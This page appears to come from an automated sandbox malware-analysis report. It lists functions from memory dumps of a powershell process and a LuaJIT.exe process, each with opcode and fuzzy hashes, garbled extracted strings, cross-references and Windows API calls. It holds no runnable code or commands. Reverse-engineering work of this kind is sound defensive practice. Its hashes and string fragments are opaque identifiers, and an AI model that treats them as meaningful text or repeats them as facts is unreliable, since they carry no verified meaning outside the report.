Uniqueness Score: -1.00%

Function 04E08BF8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85db8522314c5a8e7a6d363a935d6c5634258b9da6b4e042e0f6bce73e8b9ec5
Instruction ID: 426a570cde1ab322eb841c4915fb1a7471a3fad4c7dd753d901e2fd65e777678
Opcode Fuzzy Hash: 85db8522314c5a8e7a6d363a935d6c5634258b9da6b4e042e0f6bce73e8b9ec5
Instruction Fuzzy Hash: A4E0263930462457DB083778B40C2AE7A6AEBC476CF00602EF60B83385CF38680593E9

Uniqueness

Uniqueness Score: -1.00%

Function 04E07B9A Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 989e8efad946db2782e40c9dd986061c3021da6a5e377ea4f6974c3560ea884d
Instruction ID: 0d52a1a4ce01b6de2feae5ae8fc9fca0d73603b9d7f2c2b1eb4335f025ae990e
Opcode Fuzzy Hash: 989e8efad946db2782e40c9dd986061c3021da6a5e377ea4f6974c3560ea884d
Instruction Fuzzy Hash: E0E086352493449FDB054B75A4504997B71EF4223430498FBD9598B592D763E487DB10

Uniqueness

Uniqueness Score: -1.00%

Function 04E097F0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9c36ac6bf505c8feccfa4fa29554dd806eab5b7f17613a9e1afcb49673eaced
Instruction ID: 27d1004e1f747aa5a43fc62b23ca5c57a27abe7e157895fb5cfa963f68cff7e2
Opcode Fuzzy Hash: c9c36ac6bf505c8feccfa4fa29554dd806eab5b7f17613a9e1afcb49673eaced
Instruction Fuzzy Hash: 2BD05E127401264716A43BAA1C0067BA1CFDBC44AD709A4369B18C33C2ED40EC4247F5

Uniqueness

Uniqueness Score: -1.00%

Function 04E0E0E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2077f97af497d423c3895d5c23f05cdb50319ae024b8a75e8748368a42ba4e87
Instruction ID: 98ac136c1693e3aeff88af07d3d9f6974d0f2ca1c8995c5543a85343cc5e9c34
Opcode Fuzzy Hash: 2077f97af497d423c3895d5c23f05cdb50319ae024b8a75e8748368a42ba4e87
Instruction Fuzzy Hash: 54E0CD31304614474315666EF80085F7BEADFCD675300843DE02AC7750DF64ED4547D5

Uniqueness

Uniqueness Score: -1.00%

Function 04E0E130 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: bf8c1eaa87e1a7abc8296255526512a9df8074f2598b6cf145163689d384a765
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: 1BE08631B0011497CB08959DD4544D9F7A5DBCD220F04C47AD91AA7380DA32695686D1

Uniqueness

Uniqueness Score: -1.00%

Function 04E0CC28 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be3b1a96f6b3e2ab75d4de3f9cc38bf29ebba59523a5acfb54d72edbb42ced0f
Instruction ID: 208c914128ca14b7003f1af92c128ee381d716c9b6f8de36a7f8f91529079562
Opcode Fuzzy Hash: be3b1a96f6b3e2ab75d4de3f9cc38bf29ebba59523a5acfb54d72edbb42ced0f
Instruction Fuzzy Hash: 65E0CD353081501FD311537CB8159A9BFF5EBD726630400BFE54AD3352D9559C058791

Uniqueness

Uniqueness Score: -1.00%

Function 04E089B9 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf5dfe45c913b9ab1d89d5d0d50c3caff865650775dcaf9db575d0d7bde74a8f
Instruction ID: cf57e1ce54f75a44cdde39dbcf2ea17c7c34ead1142463a2e0b55165b17ecd41
Opcode Fuzzy Hash: cf5dfe45c913b9ab1d89d5d0d50c3caff865650775dcaf9db575d0d7bde74a8f
Instruction Fuzzy Hash: 42E04F389080498BCF09BBA0F85E8EE7F34EE05305F4001ACE96662192EA61598FDA81

Uniqueness

Uniqueness Score: -1.00%

Function 04E08A80 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e143158cf9623021f9a56a6ff4e441366599e713d4689fcf000ad539755debd3
Instruction ID: 000f3c6620ab68606a3fdccd2360b5b44c91d509193ce1ee670fa2e5c1cc3465
Opcode Fuzzy Hash: e143158cf9623021f9a56a6ff4e441366599e713d4689fcf000ad539755debd3
Instruction Fuzzy Hash: F0E0D8349082899BCB04DF68F40686FBFF4EF45244F00519DF945A7202D6311485DF81

Uniqueness

Uniqueness Score: -1.00%

Function 04E0F8A0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19749860b5623c94253a04d7999f1c647b9a74fafdd14bf24deb17b7b72ad1ee
Instruction ID: a7dd5edc1efc902fc5276c674564cb067506e4564ba3def655b5c835ad82c07a
Opcode Fuzzy Hash: 19749860b5623c94253a04d7999f1c647b9a74fafdd14bf24deb17b7b72ad1ee
Instruction Fuzzy Hash: 7CE01A74D0424AAF8B80DFB8984159DFBF0EF59200F60C0AA9919D7241E6329A52CB81

Uniqueness

Uniqueness Score: -1.00%

Function 04E0CC38 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f6d5aa423b7547ec7e1ed3b474c3297494a0603f619444fa438610c583c6d88
Instruction ID: 6dde4b1ab6c097eb954dfc667684fc0733306254aff20d6b32a44e7bf25bbd00
Opcode Fuzzy Hash: 1f6d5aa423b7547ec7e1ed3b474c3297494a0603f619444fa438610c583c6d88
Instruction Fuzzy Hash: 64D0A7353001141B5304636DF41465977EAE7CA57A300003EE60DC3340DE61AC0593E4

Uniqueness

Uniqueness Score: -1.00%

Function 04E0F8B0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 5a7f2a5fb6998c3b3ad21fa78a82f3bd5c669c08f258f333127170b15f877c84
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: EBD01270D002099F8780DFADC84156DFBF4EB48200F50C5AA8918D3301F73156128BD1

Uniqueness

Uniqueness Score: -1.00%

Function 04E089C8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a7546f4bdcba3284fd276af6f0ebb8eab92336303517cba15ca47d7cd9de2f
Instruction ID: 1a173fbee2dadf869d59cc2ee63ae67c6883b548d2d2ee2846a2ce1943d5fff8
Opcode Fuzzy Hash: 17a7546f4bdcba3284fd276af6f0ebb8eab92336303517cba15ca47d7cd9de2f
Instruction Fuzzy Hash: 96D067399081198BCF0CBBA4F85A4BDBB34FB14305F40516DE92762192EA316A5ADEC5

Uniqueness

Uniqueness Score: -1.00%

Function 04E08A90 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adfd0c18f3debd4702ed2338728252bed450302f3a2681cdaeb5ab450be21d49
Instruction ID: eb9df666c0b9035675c7576cf83e36b0132ab4d4b7c093b1eed0f0fc78b21480
Opcode Fuzzy Hash: adfd0c18f3debd4702ed2338728252bed450302f3a2681cdaeb5ab450be21d49
Instruction Fuzzy Hash: 09D01238A082098BC704EF64E44646DBFB4EB44204F009169E95593340EA305845DFC0

Uniqueness

Uniqueness Score: -1.00%

Function 04E0EE97 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 750472f064012392f79eaf026988ab9f054e4f9eba1b5b5c8f57c4ecf261ced3
Instruction ID: a835856f974825230a4e19aa9ceb32c1c872184ea4d6d1d9a5e1f4059b5929d2
Opcode Fuzzy Hash: 750472f064012392f79eaf026988ab9f054e4f9eba1b5b5c8f57c4ecf261ced3
Instruction Fuzzy Hash: 91D09239B01218CFCB04CB98E994ADCF771FF88325F108565E5159B251CB32E916CB80

Uniqueness

Uniqueness Score: -1.00%

Function 04E08110 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 961a19f021d9659054295139f9339af054e8c043ee3c1224b4e07e7b03fdcef0
Instruction ID: e520041678ed370522a99f8b41d3a34b5b873cadde3ed85a18bc6b8c1c3cdd26
Opcode Fuzzy Hash: 961a19f021d9659054295139f9339af054e8c043ee3c1224b4e07e7b03fdcef0
Instruction Fuzzy Hash: 63C0121100E3908EEF1387748458002BFF09E873093088DD2C0808A02BC9B84804E702

Uniqueness

Uniqueness Score: -1.00%

Function 04E07BA8 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a0a68c8f772e3b20cbf363ea1221a65f515b49e3a14918511a4b880ee4c5cd
Instruction ID: 7638c4737d52f97a6a3c45cd638b6d6e92f7154fd1b99fd4f9b54d661c3b5c99
Opcode Fuzzy Hash: 85a0a68c8f772e3b20cbf363ea1221a65f515b49e3a14918511a4b880ee4c5cd
Instruction Fuzzy Hash: 58B092340447098FCA886FB5A4048147329EE8022538014ADEE0E0B6928F77E881DE54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 07933678 Relevance: 20.5, Strings: 16, Instructions: 458COMMON

Download Yara Rule

Strings

,S4l, xrefs: 07933910
$tq, xrefs: 07933B8A
,S4l, xrefs: 07933904
$tq, xrefs: 07933A0C
*l, xrefs: 07933BCD
4'tq, xrefs: 0793392F
*l, xrefs: 07933BDB
$tq, xrefs: 07933B5F
$tq, xrefs: 07933B96
R4l, xrefs: 07933846
d5$k, xrefs: 079338F6
4'tq, xrefs: 0793372E
4'tq, xrefs: 07933925
tPtq, xrefs: 07933A9C
4'tq, xrefs: 07933722
tPtq, xrefs: 07933AA8

Memory Dump Source

Source File: 00000006.00000002.1727080731.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7930000_powershell.jbxd

Similarity

API ID:
String ID: ,S4l$,S4l$4'tq$4'tq$4'tq$4'tq$d5$k$tPtq$tPtq$$tq$$tq$$tq$$tq$R4l$*l$*l
API String ID: 0-1106947704
Opcode ID: 890c7688dcf21666f9732be46fcddc8b5913175c13b494fdb792f42796908a12
Instruction ID: dfa7ec35ecac5b9be8c8438d19b70eae20161103bc65b2b310167b5975a5d749
Opcode Fuzzy Hash: 890c7688dcf21666f9732be46fcddc8b5913175c13b494fdb792f42796908a12
Instruction Fuzzy Hash: 50E156F5B4824ADFCB258A69880177BBBF6AF82318F1484BAD545CF352DB35C841C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07931BE0 Relevance: 20.4, Strings: 16, Instructions: 397COMMON

Download Yara Rule

Strings

4'tq, xrefs: 07931C86
r4l, xrefs: 07931C53
4'tq, xrefs: 07931F95
tPtq, xrefs: 07931FEB
J5l, xrefs: 07932017
r4l, xrefs: 07931C5D
842l, xrefs: 07931F6C
4'tq, xrefs: 07931C92
4'tq, xrefs: 07931F89
tPtq, xrefs: 07931FDF
J5l, xrefs: 0793200B
J5l, xrefs: 079320CE
J5l, xrefs: 079320C2
J5l, xrefs: 07931FA1
842l, xrefs: 07931F76
$c'k, xrefs: 079320B4

Memory Dump Source

Source File: 00000006.00000002.1727080731.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7930000_powershell.jbxd

Similarity

API ID:
String ID: $c'k$4'tq$4'tq$4'tq$4'tq$842l$842l$tPtq$tPtq$J5l$J5l$J5l$J5l$J5l$r4l$r4l
API String ID: 0-2615061810
Opcode ID: 23bcd7496c9b4dc60a7412c1dc2473e088daf504e0af802ad157638a91881100
Instruction ID: 8d60b4032f739d13b981e0790728fc75764c982ada2c75d5f7f8ade4a66dd5a6
Opcode Fuzzy Hash: 23bcd7496c9b4dc60a7412c1dc2473e088daf504e0af802ad157638a91881100
Instruction Fuzzy Hash: BDD157B5B0460A8FCB259B6994016ABFBF6EFC6314F14C0BBD5158F261DB31C885C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 079310A5 Relevance: 20.3, Strings: 16, Instructions: 293COMMON

Download Yara Rule

Strings

$tq, xrefs: 079312F1
842l, xrefs: 0793119C
`Qtq, xrefs: 0793121B
`Qtq, xrefs: 079311B5
tPtq, xrefs: 079311FB
$tq, xrefs: 0793110C
842l, xrefs: 079311A6
fyq, xrefs: 0793116A
$tq, xrefs: 0793132B
$tq, xrefs: 07931301
$tq, xrefs: 0793131B
$tq, xrefs: 0793112D
$tq, xrefs: 07931149
`Qtq, xrefs: 07931227
`Qtq, xrefs: 0793125B
tPtq, xrefs: 079311EF

Memory Dump Source

Source File: 00000006.00000002.1727080731.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7930000_powershell.jbxd

Similarity

API ID:
String ID: fyq$842l$842l$`Qtq$`Qtq$`Qtq$`Qtq$tPtq$tPtq$$tq$$tq$$tq$$tq$$tq$$tq$$tq
API String ID: 0-3079049650
Opcode ID: 3225c8bdd137a7b73556f6f2bffe3f1d9374f40223a628469d80868cb2093e8d
Instruction ID: ce2334a9a38a84506bedd78b5a96a7a9bb7f24780c62d201eda1f27856897f60
Opcode Fuzzy Hash: 3225c8bdd137a7b73556f6f2bffe3f1d9374f40223a628469d80868cb2093e8d
Instruction Fuzzy Hash: 08B1F8B164060EDFCF15DFA8C840AAABBF6EF85308F148465E8019F2A0DB74DC51CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07933C88 Relevance: 12.8, Strings: 10, Instructions: 325COMMON

Download Yara Rule

Strings

tPtq, xrefs: 07933D11
$tq, xrefs: 07933CCC
tPtq, xrefs: 07933D05
4'tq, xrefs: 07933E89
$tq, xrefs: 07933F6E
*l, xrefs: 07933D6F
*l, xrefs: 07933D7D
4'tq, xrefs: 07933E95
$tq, xrefs: 07933C9A
$tq, xrefs: 07933CC0

Memory Dump Source

Source File: 00000006.00000002.1727080731.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7930000_powershell.jbxd

Similarity

API ID:
String ID: 4'tq$4'tq$tPtq$tPtq$$tq$$tq$$tq$$tq$*l$*l
API String ID: 0-2499603675
Opcode ID: c10d95168bd07a76dfbb7a849ecc995da5abf1df4e64e1b02aaf9805e094fd07
Instruction ID: c2583bdf412a320c308c5bb6c336f9741d1f2d95aec65431f8222fa73552723d
Opcode Fuzzy Hash: c10d95168bd07a76dfbb7a849ecc995da5abf1df4e64e1b02aaf9805e094fd07
Instruction Fuzzy Hash: CBA167B17483459FDB259A79C80166ABFFAAFC6214F2481ABD805CF2A2DB31CC41C761

Uniqueness

Uniqueness Score: -1.00%

Function 04E07C88 Relevance: 6.5, Strings: 5, Instructions: 244COMMON

Download Yara Rule

Strings

tM4l, xrefs: 04E07D3C
`uq, xrefs: 04E07E0A
`uq, xrefs: 04E07D8B
`uq, xrefs: 04E07EAC
`uq, xrefs: 04E07F2A

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID: tM4l$`uq$`uq$`uq$`uq
API String ID: 0-3563250721
Opcode ID: 60aedb48cfc2554e225054ca12dfb42ab2a71ef6c34d16c5708ccd086af5ab64
Instruction ID: 45c4c9f1b22ac4c49c20d8a5b5db2929e79bc21e5000a537e70b50aa62da8ecb
Opcode Fuzzy Hash: 60aedb48cfc2554e225054ca12dfb42ab2a71ef6c34d16c5708ccd086af5ab64
Instruction Fuzzy Hash: 38B1E874E0020A9FDB54DFA9D580A9DFBF2FF89304F109629E419AB354EB30A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04E07C98 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

tM4l, xrefs: 04E07D3C
`uq, xrefs: 04E07E0A
`uq, xrefs: 04E07D8B
`uq, xrefs: 04E07EAC
`uq, xrefs: 04E07F2A

Memory Dump Source

Source File: 00000006.00000002.1721845337.0000000004E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4e00000_powershell.jbxd

Similarity

API ID:
String ID: tM4l$`uq$`uq$`uq$`uq
API String ID: 0-3563250721
Opcode ID: 82c3ed24fc432950760c17bd4f0235505f32a37184cd9ef8a52897cd8b68d264
Instruction ID: ab5cd6bdeb882a7e7b6f757fc07497cca83f538fc0a78515f6c2cd2dff6e8713
Opcode Fuzzy Hash: 82c3ed24fc432950760c17bd4f0235505f32a37184cd9ef8a52897cd8b68d264
Instruction Fuzzy Hash: A3B1B874E0120A9FDB54DFA9D580A9DFBF1FF88304F109629E819AB354EB34A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 079359B0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$tq, xrefs: 079359DE
$tq, xrefs: 07935A18
$tq, xrefs: 079359C2
$tq, xrefs: 07935A0C

Memory Dump Source

Source File: 00000006.00000002.1727080731.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7930000_powershell.jbxd

Similarity

API ID:
String ID: $tq$$tq$$tq$$tq
API String ID: 0-173548568
Opcode ID: 264ad0013858eccf3f74543855ee9f7160ec68be5f987ab8168f9061aaeab35f
Instruction ID: dd0d7945fc3f16cab0a23429c8515a3d2f7f6c052ea5508d84eaf9484501486e
Opcode Fuzzy Hash: 264ad0013858eccf3f74543855ee9f7160ec68be5f987ab8168f9061aaeab35f
Instruction Fuzzy Hash: D42168B2714216ABDF34457E9881B37BBEE9BC8319F25843AD915CB381DE79C861C360

Uniqueness

Uniqueness Score: -1.00%

Function 079337F0 Relevance: 5.1, Strings: 4, Instructions: 93COMMON

Download Yara Rule

Strings

,S4l, xrefs: 07933904
4'tq, xrefs: 07933925
R4l, xrefs: 07933846
d5$k, xrefs: 079338F6

Memory Dump Source

Source File: 00000006.00000002.1727080731.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7930000_powershell.jbxd

Similarity

API ID:
String ID: ,S4l$4'tq$d5$k$R4l
API String ID: 0-1429099592
Opcode ID: 4499e8d2e52ef0978e153d98c1f9a16863efcf165b818261f0981abff835fc9f
Instruction ID: 88ba70d7d1662d4bc70f98de3f7ca890296235e7af81fa0ca007462a5889640e
Opcode Fuzzy Hash: 4499e8d2e52ef0978e153d98c1f9a16863efcf165b818261f0981abff835fc9f
Instruction Fuzzy Hash: AC31E5F4B80206EBDB248E19C441B3AB7FAAB84718F15C66AD9849F311D775DC80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07930308 Relevance: 5.1, Strings: 4, Instructions: 66COMMON

Download Yara Rule

Strings

4'tq, xrefs: 07930373
4'tq, xrefs: 0793037F
$tq, xrefs: 0793035E
$tq, xrefs: 07930352

Memory Dump Source

Source File: 00000006.00000002.1727080731.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7930000_powershell.jbxd

Similarity

API ID:
String ID: 4'tq$4'tq$$tq$$tq
API String ID: 0-3085001694
Opcode ID: 8fa4700cc7608525a3b2f7f9aebd5c1cec83e773556c201e9925e3ec282fbbe8
Instruction ID: fcec61f79fe07df2bbf22315346dadd6e194a73f603006876bdb2777bed2ec7d
Opcode Fuzzy Hash: 8fa4700cc7608525a3b2f7f9aebd5c1cec83e773556c201e9925e3ec282fbbe8
Instruction Fuzzy Hash: F01104A270E2954FC72B127C38211EAAFB68FC316571A01E3D540DF292DA184D4A83A2

Uniqueness

Uniqueness Score: -1.00%

Function 07932108 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

J5l, xrefs: 0793214A
$tq, xrefs: 07932172
$tq, xrefs: 07932166
J5l, xrefs: 07932156

Memory Dump Source

Source File: 00000006.00000002.1727080731.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7930000_powershell.jbxd

Similarity

API ID:
String ID: $tq$$tq$J5l$J5l
API String ID: 0-588044242
Opcode ID: 444a1772eff152bbc3a4fa1ae44e8fd29fab9f85393e26e161ab6ac5bdb2c226
Instruction ID: 4ef2c432b26d2b3160214ed3cdae02078f0fbfc7b1d6c76a91db1bf05446d75e
Opcode Fuzzy Hash: 444a1772eff152bbc3a4fa1ae44e8fd29fab9f85393e26e161ab6ac5bdb2c226
Instruction Fuzzy Hash: 2D01DFB660E3864FC32783BC1D10196AFB6AF83614B1A45A7CA44DF2A7C5288C55C7A6

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: LuaJIT.exePID: 8108, Parent PID: 7384COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1394
Total number of Limit Nodes:	29

Executed Functions

Function 00007FF677E921AC Relevance: 13.8, APIs: 9, Instructions: 273
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF677E91D90: _invalid_parameter_noinfo.LIBCMT ref: 00007FF677E91DD1
Part of subcall function 00007FF677E91D90: _invalid_parameter_noinfo.LIBCMT ref: 00007FF677E91E51
Part of subcall function 00007FF677E91D90: _invalid_parameter_noinfo.LIBCMT ref: 00007FF677E91EA5
Part of subcall function 00007FF677E91D90: _get_daylight.LIBCMT ref: 00007FF677E91EFD

CreateFileW.KERNELBASE ref: 00007FF677E922B2
CreateFileW.KERNEL32 ref: 00007FF677E92302
GetLastError.KERNEL32 ref: 00007FF677E92332
GetFileType.KERNELBASE ref: 00007FF677E92347
GetLastError.KERNEL32 ref: 00007FF677E92351
CloseHandle.KERNEL32 ref: 00007FF677E92384
CloseHandle.KERNEL32 ref: 00007FF677E924DF
CreateFileW.KERNEL32 ref: 00007FF677E92514
GetLastError.KERNEL32 ref: 00007FF677E92523

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
String ID:
API String ID: 1330151763-0
Opcode ID: ce5669ae4ee54aa3f53f5135a37de033940a3ee15ed4778064c01fcdce3bf99e
Instruction ID: 6faa64ffa8ed75f7b0aab69ba75a52a896f9bdb0a2d96be2229f64319256d3b8
Opcode Fuzzy Hash: ce5669ae4ee54aa3f53f5135a37de033940a3ee15ed4778064c01fcdce3bf99e
Instruction Fuzzy Hash: E8C1AA37B28A4286EB10CF69D4906BC3775FB59B98B11522ADE2E97795CF3CE052C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E8E57C Relevance: 10.8, APIs: 7, Instructions: 291
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF677E8E9B2

Memory Dump Source

Source File: 0000000A.00000002.1779592361.00007FF677DF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF677DF0000, based on PE: true

Associated: 0000000A.00000002.1779571587.00007FF677DF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779659984.00007FF677EA1000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779691872.00007FF677EC2000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.1779713026.00007FF677EC5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_7ff677df0000_LuaJIT.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7f68fa593cf1d9a2b06b63644bb3f377937709bb3d7ea6a5941bca859d8c03e4
Instruction ID: 4b335c838c190812f0ee39fafaff0d696c0c573179aeb5af556287ab136f07ee
Opcode Fuzzy Hash: 7f68fa593cf1d9a2b06b63644bb3f377937709bb3d7ea6a5941bca859d8c03e4
Instruction Fuzzy Hash: 0DC1F323A2C78691E7619B1594402BE7BA1FF91B84F492131DE8E877D6CFBCE855C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF677E4B7D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
